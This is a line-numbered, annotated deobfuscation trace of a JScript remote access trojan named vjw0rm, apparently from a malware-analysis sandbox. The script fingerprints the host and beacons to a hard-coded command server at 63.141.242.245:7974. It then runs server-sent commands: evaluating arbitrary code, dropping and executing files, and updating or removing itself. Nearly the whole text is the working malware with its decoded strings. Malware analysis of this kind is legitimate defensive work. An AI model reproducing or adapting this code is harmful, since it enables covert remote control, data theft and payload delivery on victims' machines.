57	_0x5e23cf += String['\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65'] ( _0x4d9543['\x63\x68\x61\x72\x43\x6f\x64\x65\x41\x74'] ( _0xf211b7 ) ^ _0x1a3148[( _0x1a3148[_0x21b190] + _0x1a3148[_0x2d973d] ) % 0x100] );
58	}
59	return _0x5e23cf;
60	};
61	_0x0ada['\x72\x63\x34'] = _0x428c96;
62	_0x0ada['\x64\x61\x74\x61'] =
63	{
64	};
65	_0x0ada['\x69\x6e\x69\x74\x69\x61\x6c\x69\x7a\x65\x64'] = ! ! [];
66	}
67	_0x26e318 += _0x5222f1;
68	if ( _0x0ada['\x64\x61\x74\x61'][_0x26e318] === undefined )
69	{
70	if ( _0x0ada['\x6f\x6e\x63\x65'] === undefined )
71	{
72	_0x0ada['\x6f\x6e\x63\x65'] = ! ! [];
73	}
74	_0x49d17f = _0x0ada['\x72\x63\x34'] ( _0x49d17f, _0x5222f1 );	function (_0x26e318, _0x5222f1).rc4("Q8Kxwo/CvsOPw6PDr8K1MsKFwrAoCw==","kwOS") ➔ "WScript.Shell" function (_0x26e318, _0x5222f1).rc4("wrNiw5TDvkfClMK7UMOxw7pjwr0Pw4zDp0ZeLcKAwrwgw55FVMKHBg==","$a1l") ➔ "Scripting.FileSystemObject" function (_0x26e318, _0x5222f1).rc4("wpbDgT7DlcKeQMK7NHXCgMK1WDcYw6ASw7c=","peT5") ➔ "Shell.Application" function (_0x26e318, _0x5222f1).rc4("K8OCEcODXsOyY3fDp8KcMCBGID/DpsKp","QkVl") ➔ "Microsoft.XMLHTTP" function (_0x26e318, _0x5222f1).rc4("Z8OzwqbCrg==","#XH9") ➔ "HKCU" function (_0x26e318, _0x5222f1).rc4("w4FPwqZF","QE7F") ➔ "HKLM" function (_0x26e318, _0x5222f1).rc4("w6hEXDUawpzDtn3Dg29x","iwb]") ➔ "HKCU\vjw0rm" function (_0x26e318, _0x5222f1).rc4("w6hEUy0awrnDk0zCp0pdC24Hw4LDnMOww5kbwofDviE=","iwb]") ➔ "HKLM\SOFTWARE\Classes\" function (_0x26e318, _0x5222f1).rc4("wq/DhMKzCcOOwp4=","RgIn") ➔ "REG_SZ" function (_0x26e318, _0x5222f1).rc4("wqDCtsKsccKYBsOKwpAoWcOiw6LDmQ==","^M)s") ➔ "\defaulticon\"
75	_0x0ada['\x64\x61\x74\x61'][_0x26e318] = _0x49d17f;
76	}
77	else
78	{
79	_0x49d17f = _0x0ada['\x64\x61\x74\x61'][_0x26e318];
80	}
81	return _0x49d17f;
82	};
83	var j = [ _0x0ada ( '0x0', '\x6b\x77\x4f\x53' ), _0x0ada ( '0x1', '\x24\x61\x31\x6c' ), _0x0ada ( '0x2', '\x70\x65\x54\x35' ), _0x0ada ( '0x3', '\x51\x6b\x56\x6c' ) ];	_0x0ada("0x0","kwOS") ➔ "WScript.Shell" _0x0ada("0x1","$a1l") ➔ "Scripting.FileSystemObject" _0x0ada("0x2","peT5") ➔ "Shell.Application" _0x0ada("0x3","QkVl") ➔ "Microsoft.XMLHTTP"
84	var g = [ _0x0ada ( '0x4', '\x23\x58\x48\x39' ), _0x0ada ( '0x5', '\x51\x45\x37\x46' ), _0x0ada ( '0x6', '\x69\x77\x62\x5d' ), '\x5c\x53\x6f\x66\x74\x77\x61\x72\x65\x5c\x4d\x69\x63\x72\x6f\x73\x6f\x66\x74\x5c\x57\x69\x6e\x64\x6f\x77\x73\x5c\x43\x75\x72\x72\x65\x6e\x74\x56\x65\x72\x73\x69\x6f\x6e\x5c\x52\x75\x6e\x5c', _0x0ada ( '0x7', '\x69\x77\x62\x5d' ), _0x0ada ( '0x8', '\x52\x67\x49\x6e' ), _0x0ada ( '0x9', '\x5e\x4d\x29\x73' ) ];	_0x0ada("0x4","#XH9") ➔ "HKCU" _0x0ada("0x5","QE7F") ➔ "HKLM" _0x0ada("0x6","iwb]") ➔ "HKCU\vjw0rm" _0x0ada("0x7","iwb]") ➔ "HKLM\SOFTWARE\Classes\" _0x0ada("0x8","RgIn") ➔ "REG_SZ" _0x0ada("0x9","^M)s") ➔ "\defaulticon\"
85	var y = [ _0x0ada ( '0xa', '\x51\x6b\x56\x6c' ), _0x0ada ( '0xb', '\x5b\x76\x5a\x65' ), _0x0ada ( '0xc', '\x6b\x77\x4f\x53' ), _0x0ada ( '0xd', '\x30\x54\x6f\x37' ) ];	_0x0ada("0xa","QkVl") ➔ "winmgmts:" _0x0ada("0xb","[vZe") ➔ "win32_logicaldisk" _0x0ada("0xc","kwOS") ➔ "Win32_OperatingSystem" _0x0ada("0xd","0To7") ➔ "AntiVirusProduct"
86	var sh = Cr ( 0x0 );	Cr(0) ➔
87	var fs = Cr ( 0x1 );	Cr(1) ➔
88	var spl = _0x0ada ( '0xe', '\x40\x6d\x41\x6e' );	_0x0ada("0xe","@mAn") ➔ "\|V\|"
89	var Ch = '\x5c';
90	var VN = _0x0ada ( '0xf', '\x5a\x6b\x40\x49' ) + '\x5f' + Ob ( 0x6 );	_0x0ada("0xf","Zk@I") ➔ "vjw0rm" Ob(6) ➔ "7C2D4D8F"
91	var fu = WScript[_0x0ada ( '0x10', '\x69\x77\x62\x5d' ) ];	_0x0ada("0x10","iwb]") ➔ "ScriptFullName"
92	var wn = WScript[_0x0ada ( '0x11', '\x59\x25\x32\x74' ) ];	_0x0ada("0x11","Y%2t") ➔ "ScriptName"
93	var U;
94	try
95	{
96	U = sh[_0x0ada ( '0x12', '\x70\x65\x54\x35' ) ] ( g[0x2] );	_0x0ada("0x12","peT5") ➔ "RegRead" RegRead("HKCU\vjw0rm") ➔ "FALSE"
97	}
98	catch ( _0x3d62aa )
99	{
100	var sv = fu[_0x0ada ( '0x13', '\x55\x64\x41\x47' ) ] ( '\x5c' );
101	if ( '\x3a\x5c' + sv[0x1] == '\x3a\x5c' + wn )
102	{
103	U = _0x0ada ( '0x14', '\x61\x66\x6b\x49' );
104	sh[_0x0ada ( '0x15', '\x40\x6d\x41\x6e' ) ] ( g[0x2], U, g[0x5] );
105	}
106	else
107	{
108	U = '\x46\x41\x4c\x53\x45';
109	sh[_0x0ada ( '0x16', '\x6b\x31\x4e\x62' ) ] ( g[0x2], U, g[0x5] );
110	}
111	}
112	Ns ( );	Ns() ➔ undefined
113	do
114	{
115	try
116	{
117	var P = Pt ( _0x0ada ( '0x17', '\x39\x4c\x58\x25' ), '' );	_0x0ada("0x17","9LX%") ➔ "Vre" Pt("Vre","") ➔
118	P = P[_0x0ada ( '0x18', '\x30\x75\x59\x54' ) ] ( spl );
119	if ( P[0x0] === '\x43\x6c' )
120	{
121	WScript[_0x0ada ( '0x19', '\x38\x2a\x37\x69' ) ] ( 0x1 );
122	}
123	if ( P[0x0] === '\x53\x63' )
124	{
125	var _0x4c1e39 = '\x32\x7c\x34\x7c\x33\x7c\x31\x7c\x30'[_0x0ada ( '0x1a', '\x5a\x6b\x40\x49' ) ] ( '\x7c' ), _0x7f203e = 0x0;
126	while (! ! [ ] )
127	{
128	switch ( _0x4c1e39[_0x7f203e ++] ) {
129	case '\x30' :
130	sh[_0x0ada ( '0x1b', '\x24\x61\x31\x6c' ) ] ( _0x38ee9a );
131	continue ;
132	case '\x31' :
133	_0x47bd47[_0x0ada ( '0x1c', '\x38\x2a\x37\x69' ) ] ( );
134	continue ;
135	case '\x32' :
136	var _0x38ee9a = Ex ( _0x0ada ( '0x1d', '\x59\x25\x32\x74' ) ) + '\x5c' + P[0x2];
137	continue ;
138	case '\x33' :
139	_0x47bd47[_0x0ada ( '0x1e', '\x35\x47\x33\x73' ) ] ( P[0x1] );
140	continue ;
141	case '\x34' :
142	var _0x47bd47 = fs['\x43\x72\x65\x61\x74\x65\x54\x65\x78\x74\x46\x69\x6c\x65'] ( _0x38ee9a, ! ! [] );
143	continue ;
144	}
145	break ;
146	}
147	}
148	if ( P[0x0] === '\x45\x78' )
149	{
150	eval ( P[0x1] );
151	}
152	if ( P[0x0] === '\x52\x6e' )
153	{
154	var _0x2c6aa4 = '\x39\x7c\x33\x7c\x38\x7c\x34\x7c\x36\x7c\x32\x7c\x37\x7c\x35\x7c\x31\x7c\x30'['\x73\x70\x6c\x69\x74'] ( '\x7c' ), _0x1244bb = 0x0;
155	while (! ! [ ] )
156	{
157	switch ( _0x2c6aa4[_0x1244bb ++] ) {
158	case '\x30' :
159	WScript[_0x0ada ( '0x1f', '\x40\x6d\x41\x6e' ) ] ( 0x1 );
160	continue ;
161	case '\x31' :
162	sh[_0x0ada ( '0x20', '\x73\x35\x4a\x32' ) ] ( '\x77\x73\x63\x72\x69\x70\x74\x2e\x65\x78\x65\x20\x2f\x2f\x42\x20\x22' + fu + '\x22' );
163	continue ;
164	case '\x32' :
165	var _0x191dfc = fs[_0x0ada ( '0x21', '\x6b\x31\x4e\x62' ) ] ( fu, 0x2, ! [] );
166	continue ;
167	case '\x33' :
168	var _0x2a8b36 = _0xc34b73[_0x0ada ( '0x22', '\x24\x61\x31\x6c' ) ] ( );
169	continue ;
170	case '\x34' :
171	VN = VN[_0x0ada ( '0x23', '\x34\x38\x6f\x79' ) ] ( '\x5f' );
172	continue ;
173	case '\x35' :
174	_0x191dfc[_0x0ada ( '0x24', '\x34\x38\x6f\x79' ) ] ( );
175	continue ;
176	case '\x36' :
177	_0x2a8b36 = _0x2a8b36[_0x0ada ( '0x25', '\x67\x46\x74\x30' ) ] ( VN[0x0], P[0x1] );
178	continue ;
179	case '\x37' :
180	_0x191dfc[_0x0ada ( '0x26', '\x40\x6d\x41\x6e' ) ] ( _0x2a8b36 );
181	continue ;
182	case '\x38' :
183	_0xc34b73[_0x0ada ( '0x27', '\x30\x75\x59\x54' ) ] ( );
184	continue ;
185	case '\x39' :
186	var _0xc34b73 = fs[_0x0ada ( '0x28', '\x23\x58\x48\x39' ) ] ( fu, 0x1 );
187	continue ;
188	}
189	break ;
190	}
191	}
192	if ( P[0x0] === '\x55\x70' )
193	{
194	var _0x4adf63 = _0x0ada ( '0x29', '\x39\x4c\x58\x25' ) [_0x0ada ( '0x2a', '\x59\x25\x32\x74' ) ] ( '\x7c' ), _0x2bde14 = 0x0;
195	while (! ! [ ] )
196	{
197	switch ( _0x4adf63[_0x2bde14 ++] ) {
198	case '\x30' :
199	_0x38aeb6 = _0x38aeb6[_0x0ada ( '0x2b', '\x6b\x77\x4f\x53' ) ] ( _0x0ada ( '0x2c', '\x43\x69\x4e\x28' ), _0x0ada ( '0x2d', '\x7a\x72\x33\x79' ) );
200	continue ;
201	case '\x31' :
202	_0x84a7de[_0x0ada ( '0x2e', '\x6e\x24\x78\x6c' ) ] ( );
203	continue ;
204	case '\x32' :
205	sh[_0x0ada ( '0x2f', '\x6e\x24\x78\x6c' ) ] ( _0x0ada ( '0x30', '\x34\x72\x58\x66' ) + _0x69b8be + '\x22', 0x6 );
206	continue ;
207	case '\x33' :
208	WScript[_0x0ada ( '0x31', '\x35\x47\x33\x73' ) ] ( 0x1 );
209	continue ;
210	case '\x34' :
211	_0x84a7de[_0x0ada ( '0x32', '\x31\x47\x29\x41' ) ] ( _0x38aeb6 );
212	continue ;
213	case '\x35' :
214	var _0x69b8be = Ex ( _0x0ada ( '0x33', '\x5b\x76\x5a\x65' ) ) + '\x5c' + P[0x2];
215	continue ;
216	case '\x36' :
217	var _0x84a7de = fs['\x43\x72\x65\x61\x74\x65\x54\x65\x78\x74\x46\x69\x6c\x65'] ( _0x69b8be, ! ! [] );
218	continue ;
219	case '\x37' :
220	var _0x38aeb6 = P[0x1];
221	continue ;
222	}
223	break ;
224	}
225	}
226	if ( P[0x0] === '\x55\x6e' )
227	{
228	var _0x1e270e = _0x0ada ( '0x34', '\x31\x47\x29\x41' ) [_0x0ada ( '0x35', '\x43\x69\x4e\x28' ) ] ( '\x7c' ), _0x182738 = 0x0;
229	while (! ! [ ] )
230	{
231	switch ( _0x1e270e[_0x182738 ++] ) {
232	case '\x30' :
233	var _0x10948e = Ex ( _0x0ada ( '0x36', '\x34\x38\x6f\x79' ) ) + Ch + wn;
234	continue ;
235	case '\x31' :
236	var _0x45edc1 = '\x4a\x55\x48\x5a\x33\x47\x44\x54\x43\x52';
237	continue ;
238	case '\x32' :
239	_0x1959ed = _0x1959ed[_0x0ada ( '0x37', '\x7a\x72\x33\x79' ) ] ( '\x25\x66', fu ) [_0x0ada ( '0x38', '\x52\x67\x49\x6e' ) ] ( '\x25\x6e', wn ) [_0x0ada ( '0x39', '\x51\x45\x37\x46' ) ] ( _0x0ada ( '0x3a', '\x43\x69\x4e\x28' ) , _0x10948e ) [_0x0ada ( '0x3b', '\x23\x58\x48\x39' ) ] ( _0x0ada ( '0x3c', '\x34\x38\x6f\x79' ), _0x45edc1 );
240	continue ;
241	case '\x33' :
242	WScript[_0x0ada ( '0x3d', '\x26\x4f\x45\x72' ) ] ( 0x1 );
243	continue ;
244	case '\x34' :
245	eval ( _0x1959ed );
246	continue ;
247	case '\x35' :
248	var _0x1959ed = P[0x1];
249	continue ;
250	}
251	break ;
252	}
253	}
254	if ( P[0x0] === '\x52\x46' )
255	{
256	var _0xd1dec7 = _0x0ada ( '0x3e', '\x35\x47\x33\x73' ) [_0x0ada ( '0x3f', '\x6f\x33\x6a\x6c' ) ] ( '\x7c' ), _0x580b56 = 0x0;
257	while (! ! [ ] )
258	{
259	switch ( _0xd1dec7[_0x580b56 ++] ) {
260	case '\x30' :
261	_0x397345[_0x0ada ( '0x40', '\x72\x2a\x38\x4b' ) ] ( P[0x1] );
262	continue ;
263	case '\x31' :
264	var _0x397345 = fs[_0x0ada ( '0x41', '\x5e\x30\x45\x7a' ) ] ( _0x54135d, ! ! [] );
265	continue ;
266	case '\x32' :
267	_0x397345[_0x0ada ( '0x42', '\x61\x32\x55\x47' ) ] ( );
268	continue ;
269	case '\x33' :
270	var _0x54135d = Ex ( '\x74\x65\x6d\x70' ) + '\x5c' + P[0x2];
271	continue ;
272	case '\x34' :
273	sh[_0x0ada ( '0x43', '\x34\x38\x6f\x79' ) ] ( _0x54135d );
274	continue ;
275	}
276	break ;
277	}
278	}
279	}
280	catch ( _0x481777 )
281	{
282	}
283	WScript[_0x0ada ( '0x44', '\x61\x39\x21\x54' ) ] ( 0x1b58 );
284	}
285	while( ! ! [ ] )
286	function Ex(_0x6ae459) {	Ex("TEMP") ➔ "C:\Users\user~1\AppData\Local\Temp" Ex("Windir") ➔ "C:\Windows" Ex("COMPUTERNAME") ➔ "computer" Ex("USERNAME") ➔ "user"
287	var _0x434466 = {
288	'\x67\x6f\x48' : function _0x53f05c(_0x538826, _0x3e48cd) {	[object Object]._0x53f05c("%TEMP","%") ➔ "%TEMP%" [object Object]._0x53f05c("%Windir","%") ➔ "%Windir%" [object Object]._0x53f05c("%COMPUTERNAME","%") ➔ "%COMPUTERNAME%" [object Object]._0x53f05c("%USERNAME","%") ➔ "%USERNAME%"
289	return _0x538826 + _0x3e48cd;
290	}
291	};
292	return sh[_0x0ada ( '0x45', '\x38\x42\x79\x29' ) ] ( _0x434466['\x67\x6f\x48'] ( '\x25' + _0x6ae459, '\x25' ) );	_0x0ada("0x45","8By)") ➔ "ExpandEnvironmentStrings" [object Object]._0x53f05c("%TEMP","%") ➔ "%TEMP%" ExpandEnvironmentStrings("%TEMP%") ➔ "C:\Users\user~1\AppData\Local\Temp" _0x0ada("0x45","8By)") ➔ "ExpandEnvironmentStrings" [object Object]._0x53f05c("%Windir","%") ➔ "%Windir%" ExpandEnvironmentStrings("%Windir%") ➔ "C:\Windows" _0x0ada("0x45","8By)") ➔ "ExpandEnvironmentStrings" [object Object]._0x53f05c("%COMPUTERNAME","%") ➔ "%COMPUTERNAME%" ExpandEnvironmentStrings("%COMPUTERNAME%") ➔ "computer" _0x0ada("0x45","8By)") ➔ "ExpandEnvironmentStrings" [object Object]._0x53f05c("%USERNAME","%") ➔ "%USERNAME%" ExpandEnvironmentStrings("%USERNAME%") ➔ "user"
293	}
294	function Pt(_0x1641f0, _0x10bb9f) {	Pt("Vre","") ➔
295	var _0x5235e3 = {
296	'\x52\x73\x63' : function _0x2aeb34(_0x3ab378, _0x4b9cb3) {	[object Object]._0x2aeb34(function Cr(_0x49b647),3) ➔
297	return _0x3ab378 ( _0x4b9cb3 );	Cr(3) ➔
298	},
299	'\x4f\x69\x69' : function _0x5b4687(_0x2d834a, _0x259486) {	[object Object]._0x5b4687("http://63.141.242.245:7974/","Vre") ➔ "http://63.141.242.245:7974/Vre"
300	return _0x2d834a + _0x259486;
301	},
302	'\x73\x4c\x47' : function _0x40929f(_0x599025) {	[object Object]._0x40929f(function nf()) ➔ "vjw0rm_7C2D4D8F\computer\user\Microsoft Windows 7 Professional \undefined\\YES\FALSE\"
303	return _0x599025 ( );	nf() ➔ "vjw0rm_7C2D4D8F\computer\user\Microsoft Windows 7 Professional \undefined\\YES\FALSE\"
304	}
305	};
306	var _0x25962e = _0x0ada ( '0x46', '\x61\x32\x34\x74' ) [_0x0ada ( '0x47', '\x39\x4c\x58\x25' ) ] ( '\x7c' ), _0x5c2e17 = 0x0;	_0x0ada("0x46","a24t") ➔ "0\|2\|3\|1\|4" _0x0ada("0x47","9LX%") ➔ "split" "0\|2\|3\|1\|4".split("\|") ➔ 0,2,3,1,4
307	while (! ! [ ] )
308	{
309	switch ( _0x25962e[_0x5c2e17 ++] ) {
310	case '\x30' :
311	var _0x11073b = _0x5235e3['\x52\x73\x63'] ( Cr, 0x3 );	[object Object]._0x2aeb34(function Cr(_0x49b647),3) ➔
312	continue ;
313	case '\x31' :
314	_0x11073b[_0x0ada ( '0x48', '\x61\x57\x6e\x34' ) ] ( _0x10bb9f );	_0x0ada("0x48","aWn4") ➔ "send" send("") ➔
315	continue ;
316	case '\x32' :
317	_0x11073b[_0x0ada ( '0x49', '\x5a\x6b\x40\x49' ) ] ( _0x0ada ( '0x4a', '\x6e\x24\x78\x6c' ), _0x5235e3[_0x0ada ( '0x4b', '\x48\x75\x49\x26' ) ] ( _0x0ada ( '0x4c', '\x51\x45\x37\x46' ), _0x1641f0 ), ! [] );	_0x0ada("0x49","Zk@I") ➔ "open" _0x0ada("0x4a","n$xl") ➔ "POST" _0x0ada("0x4b","HuI&") ➔ "Oii" _0x0ada("0x4c","QE7F") ➔ "http://63.141.242.245:7974/" [object Object]._0x5b4687("http://63.141.242.245:7974/","Vre") ➔ "http://63.141.242.245:7974/Vre" open("POST","http://63.141.242.245:7974/Vre",false) ➔ undefined
318	continue ;
319	case '\x33' :
320	_0x11073b['\x53\x65\x74\x52\x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72'] ( _0x0ada ( '0x4d', '\x73\x35\x4a\x32' ), _0x5235e3[_0x0ada ( '0x4e', '\x61\x39\x21\x54' ) ] ( nf ) );	_0x0ada("0x4d","s5J2") ➔ "User-Agent:" _0x0ada("0x4e","a9!T") ➔ "sLG" [object Object]._0x40929f(function nf()) ➔ "vjw0rm_7C2D4D8F\computer\user\Microsoft Windows 7 Professional \undefined\\YES\FALSE\" SetRequestHeader("User-Agent:","vjw0rm_7C2D4D8F\computer\user\Microsoft Windows 7 Professional \undefined\\YES\FALSE\") ➔ undefined
321	continue ;
322	case '\x34' :
323	return _0x11073b[_0x0ada ( '0x4f', '\x34\x6b\x6c\x59' ) ];
324	continue ;
325	}
326	break ;
327	}
328	}
329	function nf() {	nf() ➔ "vjw0rm_7C2D4D8F\computer\user\Microsoft Windows 7 Professional \undefined\\YES\FALSE\"
330	var _0x5cad14 = {
331	'\x67\x71\x77' : function _0xdaa285(_0x4e8f1e, _0x1b2a02) {	[object Object]._0xdaa285(function Ex(_0x6ae459),"Windir") ➔ "C:\Windows" [object Object]._0xdaa285(function Ex(_0x6ae459),"COMPUTERNAME") ➔ "computer"
332	return _0x4e8f1e ( _0x1b2a02 );	Ex("Windir") ➔ "C:\Windows" Ex("COMPUTERNAME") ➔ "computer"
333	},
334	'\x4d\x44\x48' : function _0x59c92a(_0x36456d, _0x3570d1) {	[object Object]._0x59c92a("vjw0rm_7C2D4D8F\computer\user\Microsoft Windows 7 Professional \undefined\\YES\","FALSE") ➔ "vjw0rm_7C2D4D8F\computer\user\Microsoft Windows 7 Professional \undefined\\YES\FALSE"
335	return _0x36456d + _0x3570d1;
336	},
337	'\x62\x54\x44' : function _0x4d5aa6(_0x1e968b, _0x5d36d9) {	[object Object]._0x4d5aa6("vjw0rm_7C2D4D8F\computer\user\Microsoft Windows 7 Professional \undefined","\") ➔ "vjw0rm_7C2D4D8F\computer\user\Microsoft Windows 7 Professional \undefined\" [object Object]._0x4d5aa6("vjw0rm_7C2D4D8F\computer\user\Microsoft Windows 7 Professional \undefined\","\") ➔ "vjw0rm_7C2D4D8F\computer\user\Microsoft Windows 7 Professional \undefined\\" [object Object]._0x4d5aa6("vjw0rm_7C2D4D8F\computer\user\Microsoft Windows 7 Professional \undefined\\","YES") ➔ "vjw0rm_7C2D4D8F\computer\user\Microsoft Windows 7 Professional \undefined\\YES" [object Object]._0x4d5aa6("vjw0rm_7C2D4D8F\computer\user\Microsoft Windows 7 Professional \undefined\\YES","\") ➔ "vjw0rm_7C2D4D8F\computer\user\Microsoft Windows 7 Professional \undefined\\YES\"
338	return _0x1e968b + _0x5d36d9;
339	},
340	'\x74\x68\x69' : function _0x19036d(_0x133946, _0xf701e6) {	[object Object]._0x19036d("vjw0rm_7C2D4D8F\computer\user\Microsoft Windows 7 Professional \",undefined) ➔ "vjw0rm_7C2D4D8F\computer\user\Microsoft Windows 7 Professional \undefined"
341	return _0x133946 + _0xf701e6;
342	},
343	'\x41\x7a\x50' : function _0x506797(_0x1e44d6, _0x48ed85) {	[object Object]._0x506797("vjw0rm_7C2D4D8F\computer\","user") ➔ "vjw0rm_7C2D4D8F\computer\user"
344	return _0x1e44d6 + _0x48ed85;
345	},
346	'\x62\x47\x75' : function _0x5e15e0(_0x2c401a, _0x271e6d) {	[object Object]._0x5e15e0("vjw0rm_7C2D4D8F","\") ➔ "vjw0rm_7C2D4D8F\" [object Object]._0x5e15e0("vjw0rm_7C2D4D8F\","computer") ➔ "vjw0rm_7C2D4D8F\computer" [object Object]._0x5e15e0("vjw0rm_7C2D4D8F\computer","\") ➔ "vjw0rm_7C2D4D8F\computer\"
347	return _0x2c401a + _0x271e6d;
348	},
349	'\x6a\x6f\x42' : function _0x385e37(_0xd58f64, _0x352b51) {	[object Object]._0x385e37(function Ex(_0x6ae459),"USERNAME") ➔ "user"
350	return _0xd58f64 ( _0x352b51 );	Ex("USERNAME") ➔ "user"
351	},
352	'\x4c\x5a\x66' : function _0x2ed2(_0x5afc0f, _0x1b6d50) {	[object Object]._0x2ed2(function Ob(_0x3c168c),2) ➔ "Microsoft Windows 7 Professional "
353	return _0x5afc0f ( _0x1b6d50 );	Ob(2) ➔ "Microsoft Windows 7 Professional "
354	}
355	};
356	var _0x4ce00a, _0x161697, _0x56a86b;
357	if ( fs['\x66\x69\x6c\x65\x65\x78\x69\x73\x74\x73'] ( _0x5cad14[_0x0ada ( '0x50', '\x50\x6d\x30\x40' ) ] ( Ex, _0x0ada ( '0x51', '\x61\x32\x55\x47' ) ) + _0x0ada ( '0x52', '\x5b\x76\x5a\x65' ) ) )	_0x0ada("0x50","Pm0@") ➔ "gqw" _0x0ada("0x51","a2UG") ➔ "Windir" [object Object]._0xdaa285(function Ex(_0x6ae459),"Windir") ➔ "C:\Windows" _0x0ada("0x52","[vZe") ➔ "\Microsoft.NET\Framework\v2.0.50727\vbc.exe" fileexists("C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe") ➔ true
358	{
359	_0x161697 = _0x0ada ( '0x53', '\x6e\x49\x29\x30' );	_0x0ada("0x53","nI)0") ➔ "YES"
360	}
361	else
362	{
363	_0x161697 = '\x4e\x4f';
364	}
365	_0x4ce00a = _0x5cad14[_0x0ada ( '0x54', '\x5e\x4d\x29\x73' ) ] ( _0x5cad14[_0x0ada ( '0x55', '\x6e\x49\x29\x30' ) ] ( _0x5cad14[_0x0ada ( '0x56', '\x31\x47\x29\x41' ) ] ( _0x5cad14[_0x0ada ( '0x57', '\x6b\x31\x4e\x62' ) ] ( _0x5cad14[_0x0ada ( '0x58', '\x38\x2a\x37\x69' ) ] ( _0x5cad14[_0x0ada ( '0x59', '\x6b\x46\x40\x23' ) ] ( _0x5cad14[_0x0ada ( '0x5a', '\x43\x70\x57\x35' ) ] ( _0x5cad14[_0x0ada ( '0x5b', '\x29\x48\x4a\x53' ) ] ( _0x5cad14[_0x0ada ( '0x5c', '\x30\x54\x6f\x37' ) ] ( _0x5cad14[_0x0ada ( '0x5b', '\x29\x48\x4a\x53' ) ] ( VN, Ch ), _0x5cad14[_0x0ada ( '0x5d', '\x24\x61\x31\x6c' ) ] ( Ex, _0x0ada ( '0x5e', '\x6f\x33\x6a\x6c' ) ) ), Ch ), _0x5cad14['\x6a\x6f\x42'] ( Ex, _0x0ada ( '0x5f', '\x70\x65\x54\x35' ) ) ) + Ch + _0x5cad14[_0x0ada ( '0x60', '\x51\x45\x37\x46' ) ] ( Ob, 0x2 ) + Ch, Ob ( 0x4 ) ), Ch ), Ch ), _0x161697 ), Ch ), U ) + Ch;	_0x0ada("0x54","^M)s") ➔ "MDH" _0x0ada("0x55","nI)0") ➔ "bTD" _0x0ada("0x56","1G)A") ➔ "bTD" _0x0ada("0x57","k1Nb") ➔ "bTD" _0x0ada("0x58","8*7i") ➔ "bTD" _0x0ada("0x59","kF@#") ➔ "thi" _0x0ada("0x5a","CpW5") ➔ "AzP" _0x0ada("0x5b",")HJS") ➔ "bGu" _0x0ada("0x5c","0To7") ➔ "bGu" _0x0ada("0x5b",")HJS") ➔ "bGu" [object Object]._0x5e15e0("vjw0rm_7C2D4D8F","\") ➔ "vjw0rm_7C2D4D8F\" _0x0ada("0x5d","$a1l") ➔ "gqw" _0x0ada("0x5e","o3jl") ➔ "COMPUTERNAME" [object Object]._0xdaa285(function Ex(_0x6ae459),"COMPUTERNAME") ➔ "computer" [object Object]._0x5e15e0("vjw0rm_7C2D4D8F\","computer") ➔ "vjw0rm_7C2D4D8F\computer" [object Object]._0x5e15e0("vjw0rm_7C2D4D8F\computer","\") ➔ "vjw0rm_7C2D4D8F\computer\" _0x0ada("0x5f","peT5") ➔ "USERNAME" [object Object]._0x385e37(function Ex(_0x6ae459),"USERNAME") ➔ "user" [object Object]._0x506797("vjw0rm_7C2D4D8F\computer\","user") ➔ "vjw0rm_7C2D4D8F\computer\user" _0x0ada("0x60","QE7F") ➔ "LZf" [object Object]._0x2ed2(function Ob(_0x3c168c),2) ➔ "Microsoft Windows 7 Professional " Ob(4) ➔ undefined [object Object]._0x19036d("vjw0rm_7C2D4D8F\computer\user\Microsoft Windows 7 Professional \",undefined) ➔ "vjw0rm_7C2D4D8F\computer\user\Microsoft Windows 7 Professional \undefined" [object Object]._0x4d5aa6("vjw0rm_7C2D4D8F\computer\user\Microsoft Windows 7 Professional \undefined","\") ➔ "vjw0rm_7C2D4D8F\computer\user\Microsoft Windows 7 Professional \undefined\" [object Object]._0x4d5aa6("vjw0rm_7C2D4D8F\computer\user\Microsoft Windows 7 Professional \undefined\","\") ➔ "vjw0rm_7C2D4D8F\computer\user\Microsoft Windows 7 Professional \undefined\\" [object Object]._0x4d5aa6("vjw0rm_7C2D4D8F\computer\user\Microsoft Windows 7 Professional \undefined\\","YES") ➔ "vjw0rm_7C2D4D8F\computer\user\Microsoft Windows 7 Professional \undefined\\YES" [object Object]._0x4d5aa6("vjw0rm_7C2D4D8F\computer\user\Microsoft Windows 7 Professional \undefined\\YES","\") ➔ "vjw0rm_7C2D4D8F\computer\user\Microsoft Windows 7 Professional \undefined\\YES\" [object Object]._0x59c92a("vjw0rm_7C2D4D8F\computer\user\Microsoft Windows 7 Professional \undefined\\YES\","FALSE") ➔ "vjw0rm_7C2D4D8F\computer\user\Microsoft Windows 7 Professional \undefined\\YES\FALSE"
366	return _0x4ce00a;
367	}
368	function Cr(_0x49b647) {	Cr(0) ➔ Cr(1) ➔ Cr(2) ➔ Cr(3) ➔
369	return new ActiveXObject ( j[_0x49b647] );
370	}
371	function Ob(_0x3c168c) {	Ob(6) ➔ "7C2D4D8F" Ob(2) ➔ "Microsoft Windows 7 Professional " Ob(4) ➔ undefined
372	var _0x4c4019 = {
373	'\x66\x59\x42' : function _0x391b22(_0x67bb32, _0x5ee95c) {	[object Object]._0x391b22(6,2) ➔ false [object Object]._0x391b22(6,4) ➔ false [object Object]._0x391b22(2,2) ➔ true [object Object]._0x391b22(4,2) ➔ false [object Object]._0x391b22(4,4) ➔ true
374	return _0x67bb32 == _0x5ee95c;
375	},
376	'\x4f\x44\x52' : function _0x44d639(_0x1855b6, _0x3abf39) {	[object Object]._0x44d639( function GetObject(),"winmgmts:") ➔ [object Object]._0x44d639( function GetObject(),"winmgmts:\\localhost\root\securitycenter") ➔
377	return _0x1855b6 ( _0x3abf39 );	_0x1855b6("winmgmts:") ➔ _0x1855b6("winmgmts:\\localhost\root\securitycenter") ➔
378	},
379	'\x42\x73\x43' : function _0x5e1960(_0x43d979, _0x497e17) {	[object Object]._0x5e1960("winmgmts:\\localhost\root\securitycenter","2") ➔ "winmgmts:\\localhost\root\securitycenter2"
380	return _0x43d979 + _0x497e17;
381	}
382	};
383	var _0x400a88;
384	if ( _0x4c4019[_0x0ada ( '0x61', '\x5e\x30\x45\x7a' ) ] ( _0x3c168c, 0x2 ) )	_0x0ada("0x61","^0Ez") ➔ "fYB" [object Object]._0x391b22(6,2) ➔ false _0x0ada("0x61","^0Ez") ➔ "fYB" [object Object]._0x391b22(2,2) ➔ true _0x0ada("0x61","^0Ez") ➔ "fYB" [object Object]._0x391b22(4,2) ➔ false
385	{
